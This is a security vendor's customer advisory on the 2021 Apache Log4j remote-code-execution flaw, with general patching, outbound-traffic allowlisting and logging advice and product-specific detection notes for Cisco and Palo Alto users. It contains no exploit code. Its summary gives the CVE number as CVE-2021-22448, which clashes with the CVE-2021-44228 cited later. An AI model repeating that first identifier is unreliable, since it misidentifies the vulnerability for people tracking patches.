Critical Vulnerability in Apache Log4j

Executive Summary

A critical vulnerability has been discovered in Apache Log4j (CVE-2021-22448), which has a maximum CVSS score of 10. The vulnerability is considered to be easy to exploit, and unfortunately Apache Log4j is widespread.

Apache Log4j is an open source Java-based logging framework, which is used in many Java applications, affecting products and systems both located in the cloud and on-prem.

The vulnerability is exploited by sending a specially configured package to a system using Apache Log4j. The package instructs the system to download and subsequently execute malicious software.

The vulnerability was identified on December 9, 2021, so it is very new, and it means that there are still many systems that are not patched or where a patch is not yet available. There are still many manufacturers who continue to examine their products for whether they are vulnerable or not.

Conscia will make sure to keep our customers updated via CNS and on various social media as soon as we have new information.

What do I do now?

Keep an eye out for advisories from the manufacturers and Conscia
Manufacturers are working hard to get their products tested and (if they prove to be vulnerable) create and distribute a patch against Log4j. Conscia follows this and updates you via CNS and social media.

Update your Apache Log4j
If you are maintaining a system that uses Apache Log4j, you should update to the latest version of Log4j.

Create a whitelist of Internet traffic from your servers.
If your servers cannot download the malicious software from the Internet, then your servers will not be affected by this vulnerability. You should therefore create rules in your NGFW, Proxy or Umbrella with a white list of traffic from the servers towards legitimate update servers (Windows update etc.) and possibly DNS, NTP etc. if this is not hosted locally. All other traffic should be blocked.

Logging
Keep an eye on the log in your firewall, your network and on your servers in the near future. The vulnerability is being exploited out there and all surfaces for attacks are not necessarily illuminated yet. Conscia can also help keep an eye on your log. Contact your account manager for more information.

For Cisco customers:

  • For customers using Cisco Firepower NGFW, Cisco has released Snort 2 and Snort 3 rules that can detect and block the attack. You should verify that the rules are downloaded and deployed on your Firepower device.”Talos is releasing Snort 2 SIDs 58722-58733 and Snort 3 SIDs: 300055-300057 to address CVE-2021-44228, an RCE vulnerability in the Apache Log4j API.”
    Source: https://www.snort.org/advisories/talos-rules-2021-12-10
  • SSL decryption is required to detect all attempts to exploit this attack. If SSL decryption is impossible, you should create a whitelist of FQDN / URLs from your servers against the Internet so your systems can not download the malicious software or you should implement Secure Endpoint / Umbrella.
  • Cisco Secure Endpoint (AMP for Endpoint) can block attempts to exploit this vulnerability.
  • Cisco Umbrella can block access to malicious domains, IPs, and URLs.

Cisco has many products, so they are still investigating which of their products are potentially vulnerable. Cisco is updating the following advisory about your products:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd#vp

For Palo Alto customers:

  • Customers with Next-Generation Firewalls with an active Threat Prevention security subscription can detect and block sessions with the following Threat Ids:- 91991 (initially released using Applications and Threat content update version 8498 and further enhanced with version 8499). Additionally, attacker infrastructure is continuously being monitored and blocked.- 91994 and 91995 (released using Applications Threat content version 8500).SSL decryption is required to detect all attempts to exploit this attack. If this is not possible, then you should create a whitelist of FQDN / URLs from your servers against the Internet so that your systems can not download the malicious software or you should implement Cortex XDR.
  • Cortex XDR is protected through Behavioral Threat Protection (BTP) with the exception of Cortex on Linux, which is protected by the content package 290-78377.
  • Cortex XSOAR customers can take advantage of the “CVE-2021-44228 – Log4j RCE” package to automatically detect and mitigate the vulnerability.
  • Prisma Cloud Compute Defender agents can detect continuous integration (CI) project, container image, or host system that maintains a vulnerable Log4j package.

Source: https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/

You can find more information here:

Also you can read our Swedish blog post about the log4j vulnerability, and our Dutch blog post about log4j vulnerability here. If you have any questions or concerns, you are welcome to contact your local Conscia office.

Contact
Contact us now